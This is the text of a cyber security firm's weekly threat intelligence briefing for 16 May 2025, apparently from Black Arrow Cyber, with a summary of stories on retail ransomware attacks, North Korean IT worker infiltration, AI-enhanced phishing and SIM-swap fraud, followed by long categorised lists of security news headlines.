Cyber Security Now Central to Digital Health M&A Success
Data Protection
Meta plans to train AI on EU user data from May 27 without consent
Irish DPC okays Meta's EU AI training plans • The Register
Careers, Working in Cyber and Information Security
UK Cyber Vacancies Growing 12% Per Year - Infosecurity Magazine
Why so many military veterans move into cyber security - BBC News
Law Enforcement Action and Take Downs
Lumma infostealer infected about 10 million systems before global disruption | CyberScoop
Police takes down 300 servers in ransomware supply-chain crackdown
Police arrests 270 dark web vendors, buyers in global crackdown
Feds finger Russian 'Qakbot mastermind', 700k computers hit • The Register
SIM scammer who helped hijack SEC X account put behind bars • The Register
Hacker Charged for Hijacking SEC Account to Promote Fake Bitcoin News
US Navy petty officer charged in horrific CSAM case • The Register
Teen to plead guilty to PowerSchool extortion attack • The Register
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
From 60 to 4,000: NATO's Locked Shields Reflects Cyber Defence Growth - SecurityWeek
China
Chinese hackers breach US local governments using Cityworks zero-day
Ivanti EPMM flaw exploited by Chinese hackers to breach govt agencies
Chinese ‘kill switches’ found in US solar farms
Russia
Russia-linked APT28 targets western logistics entities and technology firms
Russian APT Groups Intensify Attacks in Europe with Zero-Day Exploits - Infosecurity Magazine
Nation-state APTs ramp up attacks on Ukraine and the EU - Help Net Security
Scattered Spider's Ties to Russia: Closer Than We Think?
Unpacking Russia's cyber nesting doll - Atlantic Council
Europe sanctions Putin's pals over 'hybrid' threats • The Register
Russia to enforce location tracking app on all foreigners in Moscow
U.S. Dismantles DanaBot Malware Network, Charges 16 in $50M Global Cyber Crime Operation
Russian Threat Actor TAG-110 Goes Phishing in Tajikistan
Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence
Tools and Controls
You do a fire drill, so do a cyber attack drill
100+ Fake Chrome Extensions Found Hijacking Sessions, Stealing Credentials, Injecting Ads
Data-stealing Chrome extensions impersonate Fortinet, YouTube, VPNs
Finding the right balance between 'vibe coders' and security - IT Security Guru
Lessons from the M&S cyber attack: how brands can survive digital catastrophe | Creative Boom
NCSC Helps Firms Securely Dispose of IT Assets - Infosecurity Magazine
Modern authentication: Why OIDC and SAML are just the start - Security Boulevard
Threat intelligence is crucial but organisations struggle to use it
The hidden gaps in your asset inventory, and how to close them - Help Net Security
How to Develop & Communicate Metrics for CSIRPs
Warning! Malicious Chrome extensions found mimicking legit tools | PCWorld
What is Universal 2nd Factor (U2F)? | Definition from TechTarget
Identity Security Has an Automation Problem—And It's Bigger Than You Think
GitLab's AI Assistant Opened Devs to Code Theft
AI hallucinations and their risk to cyber security operations - Help Net Security
What good threat intelligence looks like in practice - Help Net Security
Other News
SMBs remain easy pickings for cyber criminals - here’s why | TechRadar
From 60 to 4,000: NATO's Locked Shields Reflects Cyber Defence Growth - SecurityWeek
Cyber security: Lack of planning and outdated IT systems putting Scotland at risk
Healthcare Cyber Attacks Intensify, Sector Now Prime Target - Infosecurity Magazine
Cyber attack threat keeps me awake at night, bank boss says - BBC News
How to safeguard your small business in the hybrid work era: 5 top cyber security solutions | ZDNET
UK 'extremely dependent' on the US for space security • The Register
Why shipping can’t wait for another cyber security crisis - Splash247
German Cyber Agency Sounds Warning on Grid Vulnerabilities
UK Science Funding HQ hit by 5.4M cyber assaults as attacks increase 600%
Vulnerability Management
Russian APT Groups Intensify Attacks in Europe with Zero-Day Exploits - Infosecurity Magazine
Nation-state APTs ramp up attacks on Ukraine and the EU - Help Net Security
CVE Disruption Threatens Foundations of Defensive Security
Vulnerability Exploitation Probability Metric Proposed by NIST, CISA Researchers - SecurityWeek
NIST's LEV Equation to Rate Chances a Bug Was Exploited
Vulnerabilities
Same suspected Chinese spies again attacking Ivanti bugs • The Register
Ivanti RCE attacks 'ongoing,' exploitation hits clouds • The Register
NATO-Flagged Vulnerability Tops Latest VMware Security Patch Batch - SecurityWeek
Critical OpenPGP.js Vulnerability Allows Spoofing - SecurityWeek
GitLab, Atlassian Patch High-Severity Vulnerabilities - SecurityWeek
Unpatched Windows Server Flaw Threatens AD Users
Cisco Patches High-Severity DoS, Privilege Escalation Vulnerabilities - SecurityWeek
Mozilla fixed zero-days demonstrated at Pwn2Own Berlin 2025
Windows 10 emergency updates fix BitLocker recovery issues
Multiple pfSense Firewall Vulnerabilities Let Attackers Inject Malicious Codes
RCE Vulnerability Found in RomethemeKit For Elementor Plugin - Infosecurity Magazine
O2 UK patches bug leaking mobile user location from call metadata
Critical Zero-Days Found in Versa Networks SD-WAN/SASE Platform - Infosecurity Magazine
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Contact us to help assess where your risks lie and to ensure you are doing all you can do to keep you and your business secure.
Look out for our ‘Cyber Tip Tuesday’ video blog and on our YouTube channel.
You can also follow us on Facebook, Twitter and LinkedIn.
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Threat Intelligence Briefing 16 May 2025
Black Arrow Cyber Threat Intelligence Briefing 16 May 2025:
-Thousands of UK Companies 'Could Have M&S-Style Hackers Waiting in Their Systems'
-North Korean IT Workers Are Being Exposed on a Massive Scale, Potentially Thousands of Businesses Infiltrated
-‘They Yanked Their Own Plug’: How Co-op Averted an Even Worse Cyber Attack
-UK Government Publishes New Software and Cyber Security Codes of Practice
-Ransomware and the Board’s Role: What You Need to Know
-73% of CISOs Admit Security Incidents Due to Unknown or Unmanaged Assets
-AI Is Making Phishing Emails Far More Convincing with Fewer Typos and Better Formatting: Here’s How to Stay Safe
-Ransomware Enters ‘Post-Trust Ecosystem’
-Sim-Swap Fraud Rises by 1,000%: Why You Should Use App-Based, not SMS-Based, Two-Factor Authentication
-Cyber Threats Outpace Global Readiness
-CISOs Must Speak Business to Earn Executive Trust
-Downing St Updating Secret Contingencies for Russia Cyber Attack, Report Claims
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Executive Summary
There has been a continued rise in the sophistication and scale of social engineering threats, particularly phishing campaigns enhanced by generative AI. These attacks increasingly bypass traditional filters and exploit executive impersonation, with one malicious email now detected every 42 seconds. Simultaneously, criminal groups are embedding themselves within corporate environments for prolonged periods, enabled by ransomware-as-a-service and AI-driven deception. This underscores the need for continuous monitoring, behaviour-based threat detection, and stronger identity verification practices across organisations.
Meanwhile, the global cyber threat landscape is becoming more fragmented and unpredictable. Ransomware gangs are operating without clear allegiances, making extortion attempts more erratic and harder to trace. At the same time, state-aligned actors, including North Korean IT operatives, are covertly infiltrating Western businesses under fake identities, exploiting remote work trends to fund illicit national objectives. Despite growing investment, nearly three-quarters of CISOs admit incidents caused by unknown or unmanaged assets—highlighting the critical importance of full visibility across the digital estate.
We believe boards must move from passive oversight to active engagement. The UK’s new Cyber Governance Code of Practice reflects this shift, encouraging directors to treat cyber risk as integral to business resilience. As threats intensify, governance, testing, and strategic communication must become core pillars of cyber readiness.
Top Cyber Stories of the Last Week
Thousands of UK Companies 'Could Have M&S-Style Hackers Waiting in Their Systems'
There are warnings that a growing number of UK businesses may already be compromised, with attackers silently embedded in their systems awaiting the right moment to strike. This follows a surge in high-profile incidents including M&S, the Co-op, Dior and Harrods, linked to an evolution of criminal tactics. The emergence of ‘ransomware-as-a-service’ is enabling less skilled actors to launch sophisticated attacks using pre-built tools. Combined with generative AI-enhanced social engineering, the risk landscape is becoming more unpredictable. Many firms remain unaware of these intrusions until damage is done, highlighting the urgent need for continuous monitoring and stronger internal controls.
North Korean IT Workers Are Being Exposed on a Massive Scale, Potentially Thousands of Businesses Infiltrated
North Korean IT workers are increasingly infiltrating Western businesses by posing as legitimate remote developers, generating hundreds of millions of dollars annually to fund the regime’s weapons programmes and evade sanctions. A new report has exposed over 1,000 email addresses linked to these operations, with individuals often using fake identities, AI tools, and face-changing software to secure roles. Despite operating globally from Laos to Russia, many leave digital trails that reveal their activities. The scale and adaptability of these operations, likened to a state-run crime syndicate, underline the need for tighter scrutiny of remote hiring and identity verification processes.
‘They Yanked Their Own Plug’: How Co-op Averted an Even Worse Cyber Attack
The UK supermarket chain Co-op appears to have avoided a more severe cyber attack by rapidly disconnecting its systems after detecting malicious activity, a decision that disrupted operations but ultimately prevented ransomware deployment. In contrast, M&S suffered greater system compromise, with ongoing issues affecting online orders and store operations. The incident is costing M&S an estimated £43 million per week. The cyber crime group responsible, linked to a service known as DragonForce, claims to have accessed both retailers’ networks. Co-op’s swift response is viewed by experts as a decisive move that limited long-term damage but highlighted the continuing challenge of restoring public trust.
UK Government Publishes New Software and Cyber Security Codes of Practice
The UK government has introduced two new voluntary codes to help raise standards in cyber security and software resilience. The Cyber Governance Code of Practice, aimed at boards and directors of medium and large organisations, sets out how leadership teams should govern and monitor cyber security risks. It encourages directors to embed cyber governance into business risk management, focusing on oversight rather than operational duties. Complementing this, the Software Security Code of Practice outlines 14 principles for secure software development and maintenance, aligned with international frameworks. While voluntary, both codes may soon influence contractual requirements in supply chains.
Ransomware and the Board’s Role: What You Need to Know
Ransomware continues to escalate in scale and complexity, with attackers leveraging AI, remote work gaps, and third-party exposures to increase pressure on organisations. Boards are being urged to actively engage in cyber resilience planning, ensuring foundational controls such as multi-factor authentication, immutable backups, and incident response protocols are in place. Emphasis is also placed on testing recovery capabilities, reviewing cyber insurance terms, and rehearsing decision-making through tabletop exercises. Crucially, boards must prepare for the strategic, legal and reputational implications of whether to pay a ransom, with pre-agreed decision frameworks now seen as essential for effective crisis response.
73% of CISOs Admit Security Incidents Due to Unknown or Unmanaged Assets
Nearly three-quarters of cyber security leaders admit to experiencing security incidents due to unknown or unmanaged assets within their IT environments. Despite 90% acknowledging that attack surface management directly affects business risk, fewer than half of organisations have dedicated tools in place, and 58% lack continuous monitoring. The consequences of inaction are wide-ranging, with leaders citing risks to business continuity, customer trust, financial performance, and supplier relationships. As digital infrastructures grow more complex, firms are being urged to treat cyber risk management as a strategic priority rather than a technical afterthought.
AI Is Making Phishing Emails Far More Convincing with Fewer Typos and Better Formatting: Here’s How to Stay Safe
AI is transforming phishing into a more dangerous and convincing threat. New analysis shows that email-based scams have risen by 70% year-on-year, with one malicious message detected every 42 seconds. These attacks now feature flawless grammar, professional formatting, and realistic sender details, often impersonating senior executives. Traditional email filters are struggling, particularly against polymorphic attacks that constantly change to evade detection. Over 40% of malware in these campaigns is newly observed, including remote access tools. With generative AI accelerating this trend, organisations must shift from legacy defences to behaviour-based threat detection and strengthen verification procedures across the organisation.
Ransomware Enters ‘Post-Trust Ecosystem’
Ransomware threats have entered a new, more fragmented era, where traditional trust between cyber criminals has broken down following major law enforcement operations. High-profile takedowns in 2024 disrupted dominant ransomware groups, leading to reduced ransom payments and a shift away from large, centralised platforms. The result is a more unpredictable threat landscape, marked by agile, peer-to-peer groups and an increase in encryption-less extortion. This decentralisation, alongside the rise of ransomware ‘cartels’, signals an evolution in attacker tactics that is lowering entry barriers and complicating defensive strategies for organisations of all sizes.
Sim-Swap Fraud Rises by 1,000%: Why You Should Use App-Based, not SMS-Based, Two-Factor Authentication
Sim-swap fraud in the UK has surged by over 1,000%, with nearly 3,000 cases reported in 2024, up from just 289 the previous year. Criminals exploit mobile phone providers to hijack victims' numbers, bypassing SMS-based two-factor authentication and gaining access to personal accounts. Older consumers and sectors like retail and telecoms are particularly vulnerable. The rise of eSIMs is expected to further increase risk. In one case, a victim lost £50,000 while abroad after fraudsters took control of his accounts. Organisations are urged to strengthen identity verification processes and encourage customers to use app-based authentication methods where possible.
Cyber Threats Outpace Global Readiness
The World Economic Forum has found that cyber threats are accelerating faster than many nations and organisations can respond, with 72% of businesses reporting an increasingly risky environment. Nearly 60% have already revised their cyber security strategies in response to global tensions and emerging threats. Despite progress in areas like infrastructure protection and public-private collaboration, most national approaches remain underdeveloped, especially in supporting small businesses and defining measurable outcomes. Just 14% of organisations feel fully prepared, highlighting a growing skills gap and the need for cyber security to be treated not only as risk mitigation but as a driver of trust and innovation.
CISOs Must Speak Business to Earn Executive Trust
Many business leaders still view cyber security as a barrier to speed and innovation, rather than a business enabler. There’s an argument that this perception must shift, with CISOs framing their role in terms of operational efficiency, resilience, and growth. By automating security controls and embedding them within business functions, CISOs can eliminate bottlenecks while reducing risk. Influence grows when security is expressed in business terms, highlighting revenue protection, risk-adjusted innovation, and customer trust. Effective CISOs use clear data, visual storytelling, and scenario-based dialogue to demonstrate value, helping boards see cyber security as a strategic partner rather than a cost centre.
Downing St Updating Secret Contingencies for Russia Cyber Attack, Report Claims
The UK government is reportedly updating its national defence strategy to reflect the rising threat of state-backed cyber attacks, particularly from Russia. The revised plans will, for the first time, include specific scenarios involving cyber attacks on critical infrastructure such as power grids, gas terminals and undersea cables. The existing contingency plan, last updated in 2005, is considered outdated given today’s cyber threat landscape. A recent risk assessment warned that such attacks could cause civilian casualties and severe disruption to essential services. Ministers are now preparing strategies for maintaining government operations during wartime or major national emergencies.
Sources:
https://www.wired.com/story/north-korean-it-worker-scams-exposed/
https://www.bbc.co.uk/news/articles/cwy382w9eglo
https://corpgov.law.harvard.edu/2025/05/10/ransomware-and-the-boards-role-what-you-need-to-know/
https://www.csoonline.com/article/3980431/more-assets-more-attack-surface-more-risk.html
https://www.infosecurity-magazine.com/news/ransomware-enters-posttrust/
https://www.scworld.com/brief/report-cyber-threats-outpace-global-readiness
Governance, Risk and Compliance
A third of enterprises have been breached despite increased cyber security investment | TechRadar
Why Every CISO Should Be Gunning For A Seat At The Board Table
The CIO Role Is Expanding -- And So Are the Risks of Getting It Wrong
Fostering Resilience in Cybersecurity: Prevent Burnout and Enhance Sec Ops | MSSP Alert
Ransomware and the Board’s Role: What You Need to Know
Report: Cyber threats outpace global readiness | SC Media
CISOs must speak business to earn executive trust - Help Net Security
Cyber cover needs to be a board conversation business chiefs warned
What is business resilience? | Definition from TechTarget
How to Successfully Evaluate IT Project Risk
Tackling threats and managing budgets in an age of AI - Tech Monitor
CIOs paying too much for not enough IT security - survey - TechCentral.ie
Infosec Layoffs Aren't the Bargain Boards May Think
Building Effective Security Programs Requires Strategy, Patience, and Clear Vision
Threats
Ransomware, Extortion and Destructive Attacks
Ransomware Enters ‘Post-Trust Ecosystem,’ NCA Cyber Expert Says - Infosecurity Magazine
UK retailers face 10% rises in premiums after cyber attacks
Ransomware and the Board’s Role: What You Need to Know
The ransomware landscape in 2025 | Kaspersky official blog
Artificial Intelligence Fuels New Wave of Complex Cyber Attacks Challenging Defenders
Companies take an average of four months to report a ransomware attack
Data Exfiltration is the New Ransomware in Evolving Cyber Landscape
How Interlock Ransomware Affects the Defense Industrial Base Supply Chain
Ransomware spreads faster, not smarter - Help Net Security
Ransomware attacks up over 120 percent in two years
BianLian and RansomExx Exploit SAP NetWeaver Flaw to Deploy PipeMagic Trojan
"Endemic" Ransomware Prompts NHS to Demand Supplier Action - Infosecurity Magazine
Threat hunting case study: Medusa ransomware | Intel 471
You think ransomware is bad? Wait until it infects CPUs • The Register
Beware — These Ransomware Hackers Are Watching You Work
Moldovan Police Arrest Suspect in €4.5M Ransomware Attack on Dutch Research Agency
Ransomware Victims
Marks and Spencer could face 12% drop in profits after cyber attacks
M&S to make £100m cyber claim from Allianz and Beazley
UK retailers face 10% rises in premiums after cyber attacks
M&S Admit Customer Data Stolen in Cyber Incident | SC Media UK
What we know about DragonForce ransomware • The Register
M&S cyber attack: How sim-swap fraudsters exploit trust to steal data | The Independent
'They yanked their own plug': How Co-op averted an even worse cyber attack - BBC News
How Interlock Ransomware Affects the Defense Industrial Base Supply Chain
Coinbase Rejects $20M Ransom After Rogue Contractors Bribed to Leak Customer Data - SecurityWeek
Coinbase Targeted In $20 Million Extortion Plot Tied To Insider Data Leak - FinanceFeeds
Largest US steel manufacturer puts production on the backburner after cyber attack | TechRadar
Nova Scotia Power discloses data breach after March security incident
Security Firm Andy Frain Says 100,000 People Impacted by Ransomware Attack - SecurityWeek
Almost Half of Healthcare Breaches Involved Microsoft 365 | Security Magazine
Phishing & Email Based Attacks
New Phishing Attack Abusing Blob URLs to Bypass SEGs and Evade Analysis
Artificial Intelligence Fuels New Wave of Complex Cyber Attacks Challenging Defenders
Focused Phishing: Attack Targets Victims With Trusted Sites and Live Validation
This Microsoft 365 phishing campaign can bypass MFA - here's what we know | TechRadar
Email trap exposes 49K stockbroker customer records | Cybernews
Edinburgh schools targeted in cyber attack as pupils passwords reset - Edinburgh Live
Business Email Compromise (BEC)/Email Account Compromise (EAC)
Despite drop in cyber claims, BEC keeps going strong - Help Net Security
Other Social Engineering
North Korea’s ‘state-run syndicate’ looks at cyber operations as a survival mechanism | CyberScoop
North Korean IT Workers Are Being Exposed on a Massive Scale | WIRED
‘Hello pervert’: the sextortion scam claiming to have videoed you | Money | The Guardian
Hackers now testing ClickFix attacks against Linux targets
88% of Executives Had Home Floor Plans Available Online | Security Magazine
Fraud, Scams and Financial Crime
North Korea’s ‘state-run syndicate’ looks at cyber operations as a survival mechanism | CyberScoop
North Korean IT Workers Are Being Exposed on a Massive Scale | WIRED
Fraud Losses Hit $11m Per Company as Customers Abuse Soars - Infosecurity Magazine
M&S cyber attack: How sim-swap fraudsters exploit trust to steal data | The Independent
4 times data breaches ramped up the UK's fraud risk - Which?
European Police Bust €3m Investment Fraud Ring - Infosecurity Magazine
‘Hello pervert’: the sextortion scam claiming to have videoed you | Money | The Guardian
Deepfake voices of senior US officials used in scams: FBI • The Register
Deepfake attacks could cost you more than money - Help Net Security
International Crime Rings Defraud US Gov't Out of Billions
Artificial Intelligence
Artificial Intelligence Fuels New Wave of Complex Cyber Attacks Challenging Defenders
Cisco: Majority of Businesses Unprepared for AI Cyberattacks
NCSC sounds warning over AI threat to critical national infrastructure | UKAuthority
In the AI age, excessive data accumulation is a cyber security threat - Nikkei Asia
Can Cyber Security Keep Up With the AI Arms Race?
AI-Powered DDoS Attacks Are Changing the Threat Landscape | IT Pro
Deepfake voices of senior US officials used in scams: FBI • The Register
Deepfake attacks could cost you more than money - Help Net Security
Why security teams cannot rely solely on AI guardrails - Help Net Security
Over Three Thousand macOS Cursor Users Compromised
Deepfake Defense in the Age of AI
AI vs AI: How cyber security pros can use criminals’ tools against them - Help Net Security
FTC wants a new, segregated software system to police deepfake porn | CyberScoop
Tackling threats and managing budgets in an age of AI - Tech Monitor
Fake AI Tools Used to Spread Noodlophile Malware, Targeting 62,000+ via Facebook Lures
noyb sends Meta C&D demanding no EU user data AI training • The Register
How To Remove Meta AI From All Your WhatsApp Chats
2FA/MFA
This Microsoft 365 phishing campaign can bypass MFA - here's what we know | TechRadar
Malware
Malware landscape dominated by FakeUpdates | SC Media
Over Three Thousand macOS Cursor Users Compromised
Fake AI Tools Used to Spread Noodlophile Malware, Targeting 62,000+ via Facebook Lures
Bots/Botnets
7,000-Device Proxy Botnet Using IoT, EoL Systems Dismantled in U.S. - Dutch Operation
Police dismantles botnet selling hacked routers as residential proxies
Mobile
M&S cyber attack: How sim-swap fraudsters exploit trust to steal data | The Independent
Denial of Service/DoS/DDoS
AI-Powered DDoS Attacks Are Changing the Threat Landscape | IT Pro
A cyber attack briefly disrupted South African Airways operations
Internet of Things – IoT
UK report uncovers serious security flaws in business IoT devices
Data Breaches/Leaks
Company and Personal Data Compromised in Recent Insight Partners Hack - SecurityWeek
Insight Partners fears secret financial info cyber-stolen • The Register
4 times data breaches ramped up the UK's fraud risk - Which?
Nova Scotia Power discloses data breach after March security incident
Ascension reveals personal data of 437,329 patients exposed in cyberattack
Almost Half of Healthcare Breaches Involved Microsoft 365 | Security Magazine
Email trap exposes 49K stockbroker customer records | Cybernews
Fashion giant Dior discloses cyberattack, warns of data breach
Australian Human Rights Commission Discloses Data Breach - SecurityWeek
160,000 Impacted by Valsoft Data Breach - SecurityWeek
Organised Crime & Criminal Actors
How Security Has Changed the Hacker Marketplace
NatWest facing 100 million cyber attacks each month as experts reveal ‘staggering’ scale... - LBC
Kosovo authorities extradited admin of the cybercrime marketplace BlackDB.cc
Andrei Tarasov: Inside the Journey of a Russian Hacker on the FBI’s Most Wanted List - SecurityWeek
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
Germany Shuts Down eXch Over $1.9B Laundering, Seizes €34M in Crypto and 8TB of Data
Coinbase data breach exposes customer info and government IDs
Coinbase Rejects $20M Ransom After Rogue Contractors Bribed to Leak Customer Data - SecurityWeek
Telegram shuts ‘largest darknet marketplace to have ever existed’
Insider Risk and Insider Threats
North Korea’s ‘state-run syndicate’ looks at cyber operations as a survival mechanism | CyberScoop
North Korean IT Workers Are Being Exposed on a Massive Scale | WIRED
Layoffs pose a cybersecurity risk: Here's why offboarding matters - Help Net Security
Insider risk management needs a human strategy - Help Net Security
How working in a stressful environment affects cybersecurity - Help Net Security
Insurance
M&S to make £100m cyber claim from Allianz and Beazley
UK retailers face 10% rises in premiums after cyber attacks
Despite drop in cyber claims, BEC keeps going strong - Help Net Security
Cyber cover needs to be a board conversation business chiefs warned
Supply Chain and Third Parties
How Interlock Ransomware Affects the Defense Industrial Base Supply Chain
"Endemic" Ransomware Prompts NHS to Demand Supplier Action - Infosecurity Magazine
Cloud/SaaS
Microsoft Listens to Security Concerns and Delays New OneDrive Sync - Security Boulevard
Microsoft Teams will soon block screen capture during meetings
Almost Half of Healthcare Breaches Involved Microsoft 365 | Security Magazine
Identity and Access Management
The Persistence Problem: Why Exposed Credentials Remain Unfixed—and How to Change That
Linux and Open Source
New Linux Vulnerabilities Surge 967% in a Year - Infosecurity Magazine
Hackers now testing ClickFix attacks against Linux targets
Passwords, Credential Stuffing & Brute Force Attacks
The Persistence Problem: Why Exposed Credentials Remain Unfixed—and How to Change That
Social Media
Well, Well, Well: Meta to Add Facial Recognition To Glasses After All
Fake AI Tools Used to Spread Noodlophile Malware, Targeting 62,000+ via Facebook Lures
noyb sends Meta C&D demanding no EU user data AI training • The Register
Regulations, Fines and Legislation
Google Pays $1.375 Billion to Texas Over Unauthorized Tracking and Biometric Data Collection
Why we must reform the Computer Misuse Act: A cyber pro speaks out | Computer Weekly
EU extends cyber sanctions regime amid rising digital threats - EU Reporter
UK Government Publishes New Software and Cyber Security Codes of Practice
NCSC assures CISA relationship unchanged post-Trump • The Register
DHS won’t tell Congress how many people it’s cut from CISA | CyberScoop
10 Reasons Why America Needs a Cyber Force
New cyber security law updates may be on the way
President Trump's Qatari 747 is a flying security disaster • The Register
CISA Reverses Decision on Cyber Security Advisory Changes - Infosecurity Magazine
Update to How CISA Shares Cyber-Related Alerts and Notifications | CISA
US Army Deactivates Only Active-Duty Information Operations Command
What Does EU's Bug Database Mean for Vulnerability Tracking?
CVE funding crisis offers chance for vulnerability remediation rethink | CSO Online
Models, Frameworks and Standards
UN Launches New Cyber-Attack Assessment Framework - Infosecurity Magazine
UK Government Publishes New Software and Cyber Security Codes of Practice
New Cyber Security Certification for Defence Announced
NCSC and industry at odds over how to tackle shoddy software • The Register
Data Protection
noyb sends Meta C&D demanding no EU user data AI training • The Register
Careers, Working in Cyber and Information Security
Most businesses can't fill cyber roles leaving huge gaps in defense | TechRadar
Cyber Forensic Expert in 2,000+ Cases Faces FBI Probe – Krebs on Security
EU Launches Free Entry-Level Cyber Training Program - Infosecurity Magazine
Infosec Layoffs Aren't the Bargain Boards May Think
Law Enforcement Action and Take Downs
Police dismantles botnet selling hacked routers as residential proxies
Germany Shuts Down eXch Over $1.9B Laundering, Seizes €34M in Crypto and 8TB of Data
European Police Bust €3m Investment Fraud Ring - Infosecurity Magazine
Kosovo authorities extradited admin of the cybercrime marketplace BlackDB.cc
Moldovan Police Arrest Suspect in €4.5M Ransomware Attack on Dutch Research Agency
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
Locked Shields 2025 Showcased Nations' Commitment to Defending Cyberspace
Nation State Actors
CyberUK 2025: Resilience and APT Threats Loom Large
China
Chinese hackers behind attacks targeting SAP NetWeaver servers
Can Cybersecurity Keep Up With the AI Arms Race?
Locked Shields 2025 Showcased Nations' Commitment to Defending Cyberspace
‘Rogue’ devices found in Chinese solar inverters - PV Tech
Ghost in the machine? Rogue communication devices found in Chinese inverters | Reuters
Russia
Downing St updating secret contingencies for Russia cyberattack, report claims – PublicTechnology
Fancy Bear campaign sought emails of high-level Ukrainians and their military suppliers | CyberScoop
Andrei Tarasov: Inside the Journey of a Russian Hacker on the FBI’s Most Wanted List - SecurityWeek
North Korea
North Korea’s ‘state-run syndicate’ looks at cyber operations as a survival mechanism | CyberScoop
North Korean IT Workers Are Being Exposed on a Massive Scale | WIRED
North Korea ramps up cyberspying in Ukraine to assess war risk
Tools and Controls
CyberUK 2025: Resilience and APT Threats Loom Large
Majority of Browser Extensions Pose Critical Security Risk, A New Report Reveals
DMARC’s Future: Ignoring Email Authentication is No Longer an Option - Security Boulevard
73% of CISOs admit security incidents due to unknown or unmanaged assets | CSO Online
Layoffs pose a cybersecurity risk: Here's why offboarding matters - Help Net Security
The browser blind spot: Hidden security risks behind employee web activity - Digital Journal
UK Government Publishes New Software and Cyber Security Codes of Practice
When the Perimeter Fails: Microsegmentation as the Last Line of Defense - Security Boulevard
Cyber cover needs to be a board conversation business chiefs warned
CIOs paying too much for not enough IT security - survey - TechCentral.ie
New UK Security Guidelines Aims to Reshape Software Development
NCSC and industry at odds over how to tackle shoddy software • The Register
Locked Shields 2025 Showcased Nations' Commitment to Defending Cyberspace
Government webmail hacked via XSS bugs in global spy campaign
88% of Executives Had Home Floor Plans Available Online | Security Magazine
Why Red Teaming belongs on the C-suite agenda | TechRadar
Pen Testing for Compliance Only? It's Time to Change Your Approach
Tackling threats and managing budgets in an age of AI - Tech Monitor
Building Effective Security Programs Requires Strategy, Patience, and Clear Vision
Other News
A third of enterprises have been breached despite increased cybersecurity investment | TechRadar
Unsophisticated Hackers A Critical Threat, US Government Warns
Will cyber criminals come for accountants next? | AccountingWEB
Critical Infrastructure Siege: OT Security Still Lags
UK report uncovers serious security flaws in business IoT devices
Italy’s G7 drive for unified cyber resilience - Decode39
UK Government cyber 'battlements are crumbling' | Professional Security Magazine
Bluetooth 6.1 released, enhances privacy and power efficiency - Help Net Security
Spain to vet power plants’ cyber security for ‘great blackout’ cause | CSO Online
Departments have underestimated threat posed by cyber attacks, MPs warn
TikTok vs defence: Europe faces a reckoning over the allocation of energy
EU power grid needs trillion-dollar upgrade to avert Spain-style blackouts | Reuters
Students to be offered cyber crime protection training | The Herald
The Vatican’s cyber crusaders – POLITICO
Southwest Airlines CISO on tackling cyber risks in the aviation industry - Help Net Security
Vulnerability Management
SonicWall customers confront resurgence of actively exploited vulnerabilities | CyberScoop
Beyond Vulnerability Management – Can You CVE What I CVE?
Your old router could be a security threat - here's why and what to do | ZDNET
ISO - Configuration management: Why it’s so important for IT security
Malware landscape dominated by FakeUpdates | SC Media
DHS won’t tell Congress how many people it’s cut from CISA | CyberScoop
CISA Reverses Decision on Cybersecurity Advisory Changes - Infosecurity Magazine
EU launches own vulnerability database in wake of CVE funding issues | Cybernews
Why CVSS is failing us and what we can do about it • The Register
New Linux Vulnerabilities Surge 967% in a Year - Infosecurity Magazine
CVE funding crisis offers chance for vulnerability remediation rethink | CSO Online
EU bug database fully operational as US slashes infosec • The Register
Vulnerabilities
Microsoft Fixes 78 Flaws, 5 Zero-Days Exploited; CVSS 10 Bug Impacts Azure DevOps Server
SonicWall Under Pressure as Security Flaws Resurface | MSSP Alert
Your old router could be a security threat - here's why and what to do | ZDNET
Adobe Patches Big Batch of Critical-Severity Software Flaws - SecurityWeek
Fortinet Patches CVE-2025-32756 Zero-Day RCE Flaw Exploited in FortiVoice Systems
Critical Vulnerabilities in Mitel SIP Phones Let Attackers Inject Malicious Commands
Apple Patches Major Security Flaws in iOS, macOS Platforms - SecurityWeek
Compromised SAP NetWeaver instances are ushering in opportunistic threat actors - Help Net Security
Broadcom urges patching VMware Tools vulnerability | Cybernews
Ivanti warns of critical Neurons for ITSM auth bypass flaw
Ivanti Patches Two EPMM Zero-Days Exploited to Hack Customers - SecurityWeek
BianLian and RansomExx Exploit SAP NetWeaver Flaw to Deploy PipeMagic Trojan
New Chrome Vulnerability Enables Cross-Origin Data Leak via Loader Referrer Policy
New Linux Vulnerabilities Surge 967% in a Year - Infosecurity Magazine
SAP cyberattack widens, drawing Salt Typhoon and Volt Typhoon comparisons | CyberScoop
Critical SAP NetWeaver Vuln Faces Barrage of Cyber Attacks
SAP patches second zero-day flaw exploited in recent attacks
Commvault Command Center patch incomplete: researcher • The Register
Chipmaker Patch Tuesday: Intel, AMD, Arm Respond to New CPU Attacks - SecurityWeek
CISA Warns of TeleMessage Vuln Despite Low CVSS Score
Flaw in Asus DriverHub makes utility vulnerable to remote code execution | Tom's Hardware
Samsung Patches CVE-2025-4632 Used to Deploy Mirai Botnet via MagicINFO 9 Exploit
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
